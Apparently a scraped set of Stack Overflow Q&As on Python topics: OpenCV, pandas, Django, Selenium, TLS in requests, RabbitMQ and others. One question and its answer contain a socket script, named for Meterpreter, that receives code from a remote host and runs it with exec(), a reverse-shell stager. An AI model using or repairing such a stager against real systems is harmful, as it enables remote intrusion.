<p>I've been trying to follow the opencv installation steps from <a href="http://www.pyimagesearch.com/2015/06/15/install-opencv-3-0-and-python-2-7-on-osx/" rel="nofollow">pyimagesearch.com</a> with virtualenv. Everything works fine except for the packages path: it should be <code>/Users/JLee/Envs/cv/lib/python2.7/site-packages</code> but it's configured as <code>lib/python2.7/site-packages</code></p> <p>In Python, <code>import cv2</code> works well in the global setting but doesn't work in the 'cv' virtual environment. </p> <p>While following the steps from the site, I first proceeded without installing virtualenv, then realized I haven't installed it so I installed it later and followed the steps again. Could this be a problem? </p> <pre><code> Python 2: -- Interpreter: /Users/JLee/Envs/cv/bin/python2.7 (ver 2.7.10) -- Libraries: /usr/lib/libpython2.7.dylib (ver 2.7.10) -- numpy: /Users/JLee/Envs/cv/lib/python2.7/site-packages/numpy/core/include (ver 1.11.1) -- packages path: lib/python2.7/site-packages </code></pre> <p>This is the code for cmake to configure the build:</p> <pre><code>cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local \ -D PYTHON2_PACKAGES_PATH=/Users/JLee/Envs/cv/lib/python2.7/site-packages \ -D PYTHON2_LIBRARY=/usr/local/Cellar/python/2.7.11/Frameworks/Python.framework/Versions/2.7/bin \ -D PYTHON2_INCLUDE_DIR=/usr/local/Frameworks/Python.framework/Headers \ -D INSTALL_C_EXAMPLES=OFF -D INSTALL_PYTHON_EXAMPLES=ON \ -D BUILD_EXAMPLES=ON \ -D OPENCV_EXTRA_MODULES_PATH=/Users/JLee/Developer/opencv_project/opencv_contrib/modules .. </code></pre> <p>Thanks for the help in advance!</p>
0
2016-07-21T09:42:52Z
38,524,888
<p>For some reason it looks like CMake didn't automatically determine your <code>site-packages</code> directory for your virtual environment. That's not an issue though, because all you need to do is sym-link in the <code>cv2.so</code> file.</p> <p>Find your <code>cv2.so</code> file on disk (based on your output, it seems to be in <code>lib/python2.7/site-packages</code>) and then sym-link into your Python virtual environment <code>site-packages</code> directory. From there, everything will work as expected.</p>
1
2016-07-22T11:06:06Z
[ "python", "opencv", "virtualenv", "opencv3.0", "virtualenvwrapper" ]
Access column name for a specific value in GREL/Open Refine (or R, Python)
38,500,634
<p>I'm trying to access the value of a column name for a specific cell in Open Refine, so I can replace the value of the cell with the column name. I'm aware of the variable <code>row.columnNames</code> that returns ALL column names but is there a way to return just the one for the current cell?</p> <p>I'm trying to change a CSV from this:</p> <pre><code> Col 1 Col 2 Col 3 Row1 1 2 Row2 1 </code></pre> <p>to this:</p> <pre><code> Col 1 Col 2 Col 3 Row1 Col 2 Col 3 Row2 Col 1 </code></pre> <p>with a cell transformation like <code>if(value != NULL, GetColumNameForCurrentCellSomehow, NULL)</code></p> <p>If it's easier, I could also use R or Python to achieve this goal, but I have not found a straightforward way to do it there either.</p>
2
2016-07-21T09:43:22Z
38,502,862
<p>Try columnName</p> <p>if(value != NULL, columnName, NULL)</p> <p>This does not seem to be documneted or available under the help tab. I found it by looking at: <a href="https://github.com/OpenRefine/OpenRefine/blob/c103cdcbff49cde90409855d45f4e50b5a8349d1/main/src/com/google/refine/expr/ExpressionUtils.java#L84" rel="nofollow">https://github.com/OpenRefine/OpenRefine/blob/c103cdcbff49cde90409855d45f4e50b5a8349d1/main/src/com/google/refine/expr/ExpressionUtils.java#L84</a></p>
1
2016-07-21T11:18:54Z
[ "python", "openrefine" ]
Why when I compare the int values of an RDDpipeline i get both int and none values?
38,500,739
<p>I have a csv file that contains fields with the values <code>1</code> and <code>0</code>. Using pyspark I want to capture only those values with <code>1</code> in a specific field. When I convert the fields I transform them to <code>int</code>. When I use an <code>if</code> statement to check if the value is <code>1</code>, it returns me a lot of <code>None</code> and some <code>1</code>. Why do I have this problem? I am 100% sure that my csv file contains only the values <code>1</code> and <code>0</code>?</p> <pre><code>def vehA(line): fields = line.split(",") ddsA = int(fields[28]) ddsB = int(fields[52]) if ddsA == 1: return ddsA rdd = lines.map(vehA) rdd.collect() </code></pre> <p>Output:</p> <pre><code>1 1 1 1 1 1 1 None None None None 1 1 1 1 1 1 None None ... </code></pre> <p>I even tried this and I still get the same output:</p> <pre><code> if ddsA is not None: if ddsA == 1 and ddsA is not None: return ddsA </code></pre>
0
2016-07-21T09:48:21Z
38,501,019
<p>Your method <code>vehA</code> returns <code>None</code> when <code>ddsA</code> is not equal to <code>1</code> as you are not returning anything in case of <code>else</code> python implicitly returns <code>None</code>. </p> <p>In order to capture only <code>ddsA</code> with one you could use filter instead of map. </p>
2
2016-07-21T09:59:21Z
[ "python", "apache-spark", "rdd", "nonetype" ]
Check if there is any mail in an outlook folder received yesterday
38,501,047
<p>I need to check and verify if there is any mail received in a specific outlook folder on the day before using python code.</p> <p>I am able to access folder and read mails. But somehow, latest mail is not read when I tried GetLast() method. I use win32com module and Outlook MAPI object to do this.</p> <p>Is there any way to check if there are mails received on yesterday?</p>
-1
2016-07-21T10:00:28Z
38,512,170
<p>Use <code>Items.Restrict</code>:</p> <pre><code>yesterdaysItems = MAPIFolder.Items.Restrict("@SQL=(ReceivedTime &lt; '7/21/2016') AND (ReceivedTime &gt; '7/20/2016') ") </code></pre>
1
2016-07-21T18:49:23Z
[ "python", "email", "outlook", "pywin32", "win32com" ]
How to use selenium sending keys to this hideNameInput?
38,501,099
<p>here is the elements,i want input something into the nameNoteId.</p> <pre><code>&lt;span class="table_n_abs" onclick="hideNameInput()" id="nameNoteId" style="top: 10px; font-size: 14px; font-family: 微软雅黑; display: block;"&gt;邮箱/手机号/帐号&lt;/span&gt; </code></pre> <p>here is the codes:</p> <pre><code>from selenium import webdriver from selenium.webdriver.common.keys import Keys import time url = 'http://passport2.chaoxing.com/login?fid=1479&amp;refer=http://i.mooc.chaoxing.com' # driver = webdriver.PhantomJS() driver = webdriver.Firefox() driver.get(url) time.sleep(1) elem = driver.find_element_by_id('passwordId') elem.send_keys('CNM') not_work_elem = driver.find_element_by_id('nameNoteId') not_work_elem.click() not_work_elem.send_keys('test') time.sleep(10) driver.close() </code></pre>
1
2016-07-21T10:02:27Z
38,501,623
<p><code>send_keys()</code> does not work here because it is <code>span</code> element. If you want to change <code>span</code> content you should try using <code>execute_script()</code> as below :-</p> <pre><code>not_work_elem = driver.find_element_by_id('nameNoteId') driver.execute_script("arguments[0].textContent = arguments[1]", not_work_elem, "test") </code></pre> <p><strong>Edited</strong>:- After seeing your website when <code>clicked</code> on span <code>hideNameInput()</code> function called which provided the focus on <code>unameId</code> input and hides the visible <code>span</code>, So you should try as below :-</p> <pre><code>from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC url = 'http://passport2.chaoxing.com/login?fid=1479&amp;refer=http://i.mooc.chaoxing.com' driver = webdriver.Firefox() driver.get(url) wait = WebDriverWait(driver, 10) span = wait.until(EC.visibility_of_element_located((By.ID, "nameNoteId"))) span.click() unameId = wait.until(EC.visibility_of_element_located((By.ID, "unameId"))) unameId.send_keys('test') passwordId = wait.until(EC.visibility_of_element_located((By.ID, "passwordId"))) passwordId.send_keys('CNM') </code></pre> <p>Hope it helps...:)</p>
1
2016-07-21T10:23:22Z
[ "python", "selenium", "input" ]
Want to extract Text from HTML Document
38,501,119
<p>I want to scape some information from <a href="https://www.kickstarter.com/discover/categories/technology?ref=discover_index" rel="nofollow">the Kickstarter website</a>. The information is structured and every Kickstarter project code looks the same:</p> <pre class="lang-html prettyprint-override"><code>&lt;div class="project-card-content"&gt; &lt;h6 class="project-title"&gt;&lt;a data-pid="714867756" data-score="null" data-version="null" href="/projects/massoudhassani/mine-kafon-drone?ref=category_recommended" target=""&gt;Mine Kafon Drone&lt;/a&gt;&lt;/h6&gt; &lt;p class="project-byline"&gt;Massoud Hassani&lt;/p&gt; &lt;p class="project-blurb"&gt; Introducing the Mine Kafon Drone, an airborne demining system developed to clear all land mines around the world in less than 10 years &lt;/p&gt; &lt;/div&gt; </code></pre> <p>I need the three following strings for every <code>&lt;div class="project-card-content"&gt;</code>. For example: </p> <ol> <li>Mine Kafon Drone</li> <li>Massoud Hassani</li> <li>Introducing the Mine Kafon Drone, an airborne demining system developed to clear all land mines around the world in less than 10 years</li> </ol> <p>For the first result I used this code code in Python:</p> <pre><code>import urllib import urllib.request from bs4 import BeautifulSoup theurl = "https://www.kickstarter.com/discover/advanced?category_id=16&amp;woe_id=23424829&amp;sort=popularity&amp;seed=2448324&amp;page=1" thepage = urllib.request.urlopen(theurl) soup = BeautifulSoup(thepage,"html.parser") project1 = soup.find('div', {'class': 'project-card-content'}).findChildren('a') print (project1) </code></pre> <p>The result is: </p> <pre><code>[&lt;a data-pid="714867756" data-score="null" data-version="null" href="/projects/massoudhassani/mine-kafon-drone?ref=category_recommended" target=""&gt;Mine Kafon Drone&lt;/a&gt;] </code></pre> <p>But I only want the string <code>"Mine Kafon Drone"</code></p>
-1
2016-07-21T10:03:22Z
38,501,182
<p>Simply get text from the first "a" tag you've found.</p> <pre><code>text = project1[0].text print(text) </code></pre> <p>Result would be:</p> <pre><code>Mine Kafon Drone </code></pre> <p>To get data from every :</p> <pre><code>data = [] for div in soup.find('div', class_='project-card-content'): data.append(div.find('div', class_='project-title').text) </code></pre>
1
2016-07-21T10:05:54Z
[ "python", "html", "beautifulsoup" ]
FieldDoesNotExist error on Django production server
38,501,187
<p>After pushing my Django app to my production server I have got this error :</p> <pre><code>FieldDoesNotExist at / Class_B has no field named &lt;function DO_NOTHING at 0x7f5993ed3440&gt; </code></pre> <p>The error seems to come from a query to my databse (the same PostgreSQL database that I use for my development).</p> <p>Here is a simplified version of my model.py :</p> <pre><code>class Class_B(models.Model): field1 = models.IntegerField(primary_key=True) field2 = models.TextField(blank=True, null=True) field3 = models.CharField(max_length=25) field4 = models.CharField(max_length=100, blank=True, null=True, db_index=True) class Meta: db_table = 'class_B' select_on_save = True class Class_A(models.Model): field1 = models.OneToOneField('An_other_class', db_index=True, on_delete=models.CASCADE) field2 = models.ForeignKey('Class_A', models.DO_NOTHING, db_column='field1', db_index=True, related_name='+', blank=True, null=True) class Meta: db_table = 'class_A' </code></pre> <p>The query on which the error appeared :</p> <pre><code>print(Class_A.objects.all()) </code></pre> <p>There isn't any migration to do and some queries to the database work.</p> <p>I'm using an httpd server on CentOS with wod_wsgi. My python version is 3.3 and Django 1.8.0.</p> <p>Any known solution for this error?</p>
0
2016-07-21T10:06:00Z
38,502,744
<p>Here :</p> <pre><code>field2 = models.ForeignKey('Class_A', models.DO_NOTHING, db_column='field1', db_index=True, related_name='+', blank=True, null=True) </code></pre> <p>you're passing <code>models.DO_NOTHING</code> as positional argument instead of a named argument. This is legal in Django >= 1.9 (and will be required in Django >= 1.10), but for previous Django versions the second positional argument to <code>ForeignKey</code> is the <code>to_field</code> option, hence your error message.</p> <p>To make a long story short, you want </p> <pre><code> models.ForeignKey('Class_A', on_delete=models.DO_NOTHING, ...) </code></pre>
2
2016-07-21T11:13:23Z
[ "python", "django", "postgresql" ]
How to merge fields row-wise in a tab-delimited file with python
38,501,217
<p>These are two example rows of my tab-delimited file:</p> <pre><code>id reference_rc_001 alternative_rc_001 reference_rc_002 alternative_rc_002 reference_rc_003 alternative_rc_003 id1 0 433 0 0 69 </code></pre> <p>I would like to merge fields every two columns. The example output should look like that. This is an step of a python script. So it has to be done with python</p> <pre><code>id reference_rc_001alternative_rc_001 reference_rc_002alternative_rc_002 reference_rc_003alternative_rc_003 id1 0433 00 690 </code></pre>
0
2016-07-21T10:06:48Z
38,504,538
<p>This looks really horrible, is probably the worst way to do this and might be about as efficient as a donkey, but..... I think it works.</p> <p>You'll need to open the file, preferably using a <code>with</code> so you can iterate across the lines in the file. (Many other SO articles will deomstrate doing that with a decent explanation so I'm not going to.)</p> <p>Then use the bit of code inside my demonstration <code>for</code> loop :</p> <pre><code>for line in file: items = line.split("\t") counters = range(len(items)/2) new_items = [items[0]] + [items[1+2*x] + items[2+2*x] for x in counters ] new_line = '\t'.join(new_items) print new_line </code></pre> <p>To explain :</p> <p>I'm splitting each line into a list (using the tab as delimiter). Then I'm creating a new list by indexing the n and n+1 elements of the list and adding them together (as strings). Finally, to recreate a line of text with tab separated entries, I'm <code>join</code>ing the new list back together with tab delimiters.</p> <p>Hopefully that gives you the pieces you might need for your solution.</p>
0
2016-07-21T12:39:32Z
[ "python", "merge", "tab-delimited" ]
How does python debugger work?
38,501,245
<p>I have a basic understanding of how a debugger work but that is in context of compiled languages. How does a debugger like <code>pdb</code> work? At a very high level, I am looking for something that can explain internals of <code>pdb</code> or in general "debugging interpreted languages"</p> <p>I googled up but couldn't get any doc. This question might be too broad but link to some basic documents would allow me to study further.</p>
-1
2016-07-21T10:07:49Z
38,501,376
<p>From <a href="https://docs.python.org/2/library/pdb.html" rel="nofollow">Python 2.7 Documentation</a>:</p> <blockquote> <p>It supports setting (conditional) breakpoints and single stepping at the source line level, inspection of stack frames, source code listing, and evaluation of arbitrary Python code in the context of any stack frame.</p> </blockquote> <p>As mentioning above pdb provides you way of inspection stack frames(watching, listing, evaluation of code within frame).</p> <p>Diving into frame objects would definitely help you in understanding pdb module. See <a href="https://docs.python.org/2/library/inspect.html" rel="nofollow">inspect — Inspect live objects</a> and <a href="https://docs.python.org/2/library/inspect.html#the-interpreter-stack" rel="nofollow">The interpreter stack</a>.</p>
1
2016-07-21T10:13:00Z
[ "python", "debugging" ]
Getting “pika.exceptions.ConnectionClosed” error while using rabbitmq in python
38,501,394
<p>I am trying to use rabbitmq in python. My code is:</p> <pre><code>import pika if __name__ == '__main__': connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost')) </code></pre> <p>I am running this file using:</p> <pre><code>python3 test.py </code></pre> <p>Error Signature:</p> <pre><code>Traceback (most recent call last): File "Test.py", line 4, in &lt;module&gt; connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost')) File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/pika/adapters/blocking_connection.py", line 339, in __init__ self._process_io_for_connection_setup() File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/pika/adapters/blocking_connection.py", line 374, in _process_io_for_connection_setup self._open_error_result.is_ready) File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-packages/pika/adapters/blocking_connection.py", line 395, in _flush_output raise exceptions.ConnectionClosed() pika.exceptions.ConnectionClosed </code></pre> <p>Already referred <a href="http://stackoverflow.com/questions/22061082/getting-pika-exceptions-connectionclosed-error-while-using-rabbitmq-in-python">this</a> , but i dont have any sleep in my code. Not really sure what could go wrong. Please let me know if I am missing something obvious.</p>
0
2016-07-21T10:13:56Z
38,503,831
<p>The issue was with rabbitmqctl. Reconfigured it, Restarted service, and issue is fixed.</p> <ol> <li>Make sure rabbitmqctl is installed(if installed, uninstall it and re-install;when you just enter rabbitmqctl, it should display the help) </li> <li>rabbitmqctl start_app </li> </ol> <p>TIP: I tried installing first using 'brew',but for some reason i was able to get it right. So installed, rabbitmqctl as a separate pacakage and added to PATH</p>
0
2016-07-21T12:05:36Z
[ "python", "rabbitmq" ]
ioerror errno 13 permission denied: 'C:\\pagefile.sys'
38,501,476
<p>Below is my code, what I am trying to achieve is walking through the OS generating a MD5 hash of every file the code is functional, however, I receive the error in the title "ioerror errno 13 permission denied: 'C:\pagefile.sys'" when I try to run the file from C:\ is there a way i can run this as an admin? Even when I run cmd as an admin that does not work, thank you in advance.</p> <pre><code>import os, hashlib current_dir = os.getcwd() for root,dirs,files in os.walk(current_dir): for f in files: current_file = os.path.join(root,f) H = hashlib.md5() with open(current_file) as FIN: H.update(FIN.read()) with open("gethashes.txt", "a") as myfile: myfile.write(current_file),myfile.write(", "),myfile.write(H.hexdigest()),myfile.write("\n") print current_file, H.hexdigest() </code></pre>
-1
2016-07-21T10:17:52Z
38,504,398
<p>As mentioned in error - Permission denied - since file need to be read for getting md5 of its content. There will be always a case when we don't have read permission .</p> <pre><code>import os, hashlib def md5_chk(current_file): try: md5 = '' err = '' H = hashlib.md5() with open(current_file) as FIN: H.update(FIN.read()) md5 = H.hexdigest() except Exception, e: md5 = None err = str(e) print err return md5,err if __name__ == '__main__': current_dir = os.getcwd() for root,dirs,files in os.walk(current_dir): with open("G://gethashes.txt", "a") as myfile: for f in files: current_file = os.path.join(root,f) md5_val,err = md5_chk(current_file) if md5_val is not None: myfile.write(current_file),myfile.write(", "),myfile.write(md5_val),myfile.write("\n") print current_file, md5_val else: myfile.write(current_file),myfile.write(", "),myfile.write("Error - " + str(err)),myfile.write("\n") print current_file, str(err) </code></pre> <p>Please let me know if it is useful.</p>
0
2016-07-21T12:31:21Z
[ "python", "os.walk" ]
Forcing requests library to use TLSv1.1 or TLSv1.2 in Python
38,501,531
<p>I am trying to send a POST call using requests library in python to a server. Earlier I was able to successfully send POST calls but recently, the server deprecated TLSv1.0 and now only supports TLSv1.1 and TLSv1.2. Now the same code throws me a "requests.exceptions.SSLError: EOF occurred in violation of protocol (_ssl.c:590)" error.</p> <p>I found this thread on stackoverflow <a href="http://stackoverflow.com/questions/14102416/python-requests-requests-exceptions-sslerror-errno-8-ssl-c504-eof-occurred">Python Requests requests.exceptions.SSLError: [Errno 8] _ssl.c:504: EOF occurred in violation of protocol</a> which says that we need to subclass the HTTPAdapter after which the session object will use TLSv1. I changed my code accordingly and here is my new code</p> <pre><code>class MyAdapter(HTTPAdapter): def init_poolmanager(self, connections, maxsize, block=False): self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize, block=block, ssl_version=ssl.PROTOCOL_TLSv1) url="https://mywebsite.com/ui/" headers={"Cookie":"some_value","X-CSRF-Token":"some value","Content-Type":"application/json"} payload={"name":"some value","Id":"some value"} s = requests.Session() s.mount('https://', MyAdapter()) r=s.post(url,json=payload,headers=headers) html=r.text print html </code></pre> <p>But even after using this, I get the same error "EOF occurred in violation of protocol (_ssl.c:590)".</p> <p>My first question is that, I somewhere read that requests by default uses ssl. I know that my server used TLSv1.0 then, so was my code working because TLSv1.0 has backward compatibility with ssl3.0 ?</p> <p>My second question is that, the stackoverflow thread that I mentioned above using which I changed my code to subclass HTTPAdapter, said that this will work for TLSv1. But since TLSv1.0 is deprecated in my server, will this code still work?</p>
0
2016-07-21T10:19:41Z
38,502,727
<p>The TLS stack will use the best version available automatically. If it does not work any longer when TLS 1.0 support is disabled at the server it usually means that your local TLS stack simply does not support newer protocol version like TLS 1.2. This is often the case on Mac OS X since it ships with a rotten old version of OpenSSL (0.9.8). In this case no python code will help you to work around the problem, but you need to get a python which uses a newer version of OpenSSL.</p> <p>To check which openssl version you are using execute the following within python:</p> <pre><code>import ssl print ssl.OPENSSL_VERSION </code></pre> <p>To have support for TLS 1.2 you need OpenSSL version 1.0.2 or 1.0.1. If you have only 1.0.0 or 0.9.8 you need to upgrade your python+OpenSSL. See <a href="http://stackoverflow.com/questions/18752409/updating-openssl-in-python-2-7">Updating openssl in python 2.7</a> for more information on how to do this.</p>
0
2016-07-21T11:12:30Z
[ "python", "ssl" ]
how can i struct.unpack use domain name in place of ip in socket.connect remotely
38,501,536
<p>I have the following code, when i use it using an the external ip directly it works just fine but when i change the ip to a domain provided by dyndns it fails and throws the error listed below.</p> <pre><code>import socket,struct # Connect with hostname # dgts = socket.gethostbyname('chxxxmaz.dyndns.biz') # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect(("'" + dgts + "'", 1604)) # Connect with IP s = socket.socket(2, 1) s.connect(('197.xxx.xxx.45', 1604)) # Receive data l = struct.unpack('&gt;I', s.recv(4))[0] d = s.recv(4096) while len(d) != l: d += s.recv(4096) exec(d, {'s': s}) </code></pre> <p>The error message:</p> <pre><code>Traceback (most recent call last): File "/home/elite/Desktop/launch_meterpreter_working.py", line 8, in &lt;module&gt; l=struct.unpack('&gt;I',s.recv(4))[0] error: unpack requires a string argument of length 4 </code></pre>
0
2016-07-21T10:19:49Z
38,501,958
<p>There is no need to manually resolve the hostname, you can simply use it when connecting the socket.</p> <p>Your problem comes from the quotes that you add when you connect (why <code>"'" + dgts + "'"</code>?)</p> <pre><code>import socket, struct # Connect s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('chxxxmaz.dyndns.biz', 1604)) # Receive data l = struct.unpack('&gt;I', s.recv(4))[0] d = s.recv(4096) while len(d) != l: d += s.recv(4096) exec(d, {'s': s}) </code></pre>
0
2016-07-21T10:37:18Z
[ "python", "sockets", "static", "dns", "ip" ]
create new pandas dataframe column based on if-else condition with a lookup
38,501,685
<p>I have a pandas dataframe and I need to create a new column based on an if-else condition. This question already came up here multiple times (e.g., <a href="http://stackoverflow.com/questions/21702342/creating-a-new-column-based-on-if-elif-else-condition">Creating a new column based on if-elif-else condition</a>).</p> <p>However, I cannot apply the proposed solution, since I also need to look up values in a list in order to check the condition. I cannot do this with the proposed solution, because I am not sure how I can access my lookup-list in the external function. My lookup-list would need to be global, which I want to avoid. I have the feeling there should be a better way to do this.</p> <p>Consider the following dataframe <code>df</code>:</p> <pre><code>letters A B C D E F </code></pre> <p>I also have a list which contains lookup values:</p> <pre><code>lookup = [C,D] </code></pre> <p>Now, I want to create a new column in my dataframe which contains <code>1</code> if the respective value is contained in <code>lookup</code> and <code>0</code> if the values is not in <code>lookup</code>.</p> <p>The typical approach would be:</p> <pre><code>df.apply(helper, axis=1) def helper(row): if(row['letters'].isin(lookup)): row['result'] = 1 else: row['result'] = 0 </code></pre> <p>However, I do not know how I can access <code>lookup</code> in <code>helper()</code> without making it global.</p> <p>The result should look like this:</p> <pre><code>letters result A 0 B 0 C 1 D 1 E 0 F 0 </code></pre>
1
2016-07-21T10:25:27Z
38,502,414
<p>Although this question is very similar to the question: <a href="http://stackoverflow.com/questions/38499890/how-to-use-pandas-apply-function-on-all-columns-of-some-rows-of-data-frame">How to use pandas apply function on all columns of some rows of data frame</a></p> <p>I think here it's worth showing a couple methods, on a single line using <code>np.where</code> with a boolean mask generated from <code>isin</code>, <code>isin</code> will return a boolean Series where any rows contain any matches in your list:</p> <pre><code>In [71]: lookup = ['C','D'] df['result'] = np.where(df['letters'].isin(lookup), 1, 0) df Out[71]: letters result 0 A 0 1 B 0 2 C 1 3 D 1 4 E 0 5 F 0 </code></pre> <p>here using 2 <code>loc</code> statements and using <code>~</code> to invert the mask:</p> <pre><code>In [72]: df.loc[df['letters'].isin(lookup),'result'] = 1 df.loc[~df['letters'].isin(lookup),'result'] = 0 df Out[72]: letters result 0 A 0 1 B 0 2 C 1 3 D 1 4 E 0 5 F 0 </code></pre>
1
2016-07-21T10:58:01Z
[ "python", "pandas", "conditional", "condition" ]
connecting mysql to flask - No module named 'flaskext'
38,501,772
<p>I want to connect Mysql to Flask.</p> <p>Before adding this configuration part:</p> <pre><code>app = Flask(__name__) mysql = MySQL() app.config['MYSQL_DATABASE_USER'] = 'username' app.config['MYSQL_DATABASE_PASSWORD'] = 'password' app.config['MYSQL_DATABASE_DB'] = 'dbname' app.config['MYSQL_DATABASE_HOST'] = 'localhost' mysql.init_app(app) </code></pre> <p>I tried to import <code>from flaskext.mysql import MySQL</code> but after that, I face with this error:</p> <blockquote> <p>from flaskext.mysql import MySQL</p> <p>ImportError: No module named 'flaskext'</p> </blockquote> <p>Then I tried <code>pip install flaskext.mysql</code> but got this error:</p> <blockquote> <p>Could not find a version that satisfies the requirement flaskext.mysql (from versions: ) No matching distribution found for flaskext.mysql</p> </blockquote> <p>So what should I do then?</p>
0
2016-07-21T10:29:20Z
38,506,557
<p>The '.' is missing, try <code>from flask.ext.mysql import MySQL</code>. But if you are using Flask 0.11, extension imports of the form <code>flask.ext.foo</code> have been <a href="http://flask.pocoo.org/docs/0.11/upgrading/#extension-imports" rel="nofollow">deprecated</a> you should use <code>from flask_foo</code>. Also see <a href="http://flask.pocoo.org/docs/0.11/extensiondev/#extension-import-transition" rel="nofollow">this</a>.</p>
0
2016-07-21T14:09:40Z
[ "python", "mysql", "flask" ]
Matplotlib: combine legend with same color and name
38,501,822
<p>If I repeat the plot with same color and label name, the label would appear multiple times:</p> <pre><code>from mpl_toolkits.mplot3d import Axes3D fig = plt.figure() ax = fig.gca(projection='3d') x_labels = [10,20,30] x = [1,2,3,4] y = [3,1,5,1] for label in x_labels: x_3d = label*np.ones_like(x) ax.plot(x_3d, x, y, color='black', label='GMM') ax.legend() </code></pre> <p><a href="http://i.stack.imgur.com/J7eAB.png" rel="nofollow"><img src="http://i.stack.imgur.com/J7eAB.png" alt="enter image description here"></a></p> <p>Is it possible to make them into one, combing the same lables legends into one? Something like</p> <p><a href="http://i.stack.imgur.com/RoexB.png" rel="nofollow"><img src="http://i.stack.imgur.com/RoexB.png" alt="enter image description here"></a></p> <p>I can produce the above pic by </p> <pre><code>from mpl_toolkits.mplot3d import Axes3D fig = plt.figure() ax = fig.gca(projection='3d') x_labels = [10,20,30] x = [1,2,3,4] y = [3,1,5,1] legend = False for label in x_labels: x_3d = label*np.ones_like(x) ax.plot(x_3d, x, y, color='black', label='GMM') if legend == False: ax.legend() legend = True </code></pre> <p>But this feels very ugly, is there any good sotion? Or do I simply make the plot in a wrong way?</p>
3
2016-07-21T10:31:34Z
38,502,062
<p>You should only show the label for one of the three sets of data. The can be done by adding an if/else statement in the <code>label = ...</code> in <code>ax.plot()</code>. Below is an example:</p> <pre><code>from mpl_toolkits.mplot3d import Axes3D fig = plt.figure() ax = fig.gca(projection='3d') x_labels = [10,20,30] x = [1,2,3,4] y = [3,1,5,1] for label in x_labels: x_3d = label*np.ones_like(x) ax.plot(x_3d, x, y, color='black', label='GMM' if label == x_labels[0] else '') # above only shows the label for the first plot ax.legend() plt.show() </code></pre> <p>This gives the following graph:</p> <p><a href="http://i.stack.imgur.com/AVl1w.png" rel="nofollow"><img src="http://i.stack.imgur.com/AVl1w.png" alt="enter image description here"></a></p> <p><strong>EDIT:</strong></p> <p>If you have different colors then you could use the following to show the legend only once for each color:</p> <pre><code>fig = plt.figure() ax = fig.gca(projection='3d') x_labels = [10,20,30,40,50] x = [1,2,3,4] y = [3,1,5,1] colors = ['black','red','black','orange','orange'] labels = ['GMM','Other 1','GMM','Other 2','Other 2'] some_list= [] for i in range(len(x_labels)): x_3d = x_labels[i]*np.ones_like(x) ax.plot(x_3d, x, y, color=colors[i], label=labels[i] if colors[i] not in some_list else '') if colors.count(colors[i])&gt;1: some_list.append(colors[i]) ax.legend() plt.show() </code></pre> <p>This gives the following graph:</p> <p><a href="http://i.stack.imgur.com/WvisI.png" rel="nofollow"><img src="http://i.stack.imgur.com/WvisI.png" alt="enter image description here"></a></p>
2
2016-07-21T10:42:25Z
[ "python", "matplotlib" ]
How to ping rethinkdb in python,to check whether db server aint down?
38,501,961
<pre><code>import rethinkdb as r con=r.connect(host='localhost') </code></pre> <p>How do i ping? How do i used existing connection to ping DB server</p>
-3
2016-07-21T10:37:24Z
38,513,196
<p>If you want to check that the connection is still healthy and running queries, you could do something like <code>r.expr(0).run(conn) == 0</code>.</p>
0
2016-07-21T19:51:03Z
[ "python", "rethinkdb" ]
pandas DataFrame reset_index for columns?
38,502,084
<p>Is there any equivalent of pandas.DataFrame.reset_index which operates on the columns and is able to handle the case of duplicate column names?</p> <p>Obviously I could simply assign new values to columns, what I want to know if there is a method like df.reset_index to do that.</p> <p>Sample Input </p> <pre><code> pd.DataFrame(np.random.rand(5, 3), columns = ['A', 'A', 'B']) A A B 0 0.5 0.3 0.9 1 0.7 0.9 0.3 2 0.9 0.4 0.8 3 0.6 0.2 0.9 4 0.7 0.4 0.6 </code></pre> <p>Expected output</p> <pre><code> 0 1 2 0 0.8 0.1 0.2 1 0.4 0.2 0.4 2 0.3 0.3 0.4 3 0.4 0.1 0.8 4 1.0 0.9 0.9 </code></pre> <p>where 0, 1, 2 is just the default way of pandas to name columns in no name is provided.</p> <p>The existing methods like <code>df.rename</code> or <code>df.reindex_axis</code> do not work when I have duplicate column names</p>
4
2016-07-21T10:43:27Z
38,502,106
<p>Use <code>range</code> with length of columns by <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.shape.html" rel="nofollow"><code>shape</code></a>:</p> <pre><code>df.columns = range(df.shape[1]) print (df) 0 1 2 0 0.228080 0.884450 0.753401 1 0.176790 0.741979 0.525305 2 0.680255 0.730258 0.449681 3 0.169420 0.660825 0.986554 4 0.302204 0.040413 0.902899 </code></pre> <p>Another solution with double transposing by <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.T.html" rel="nofollow"><code>T</code></a> and <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.reset_index.html" rel="nofollow"><code>reset_index</code></a> with parameter <code>drop=True</code>:</p> <pre><code>df = df.T.reset_index(drop=True).T print (df) 0 1 2 0 0.024846 0.688193 0.887926 1 0.284681 0.895319 0.142876 2 0.440834 0.299527 0.762815 3 0.936967 0.928907 0.642960 4 0.801077 0.085773 0.866651 </code></pre>
2
2016-07-21T10:44:22Z
[ "python", "pandas", "dataframe", "duplicates", "reindex" ]
pandas DataFrame reset_index for columns?
38,502,084
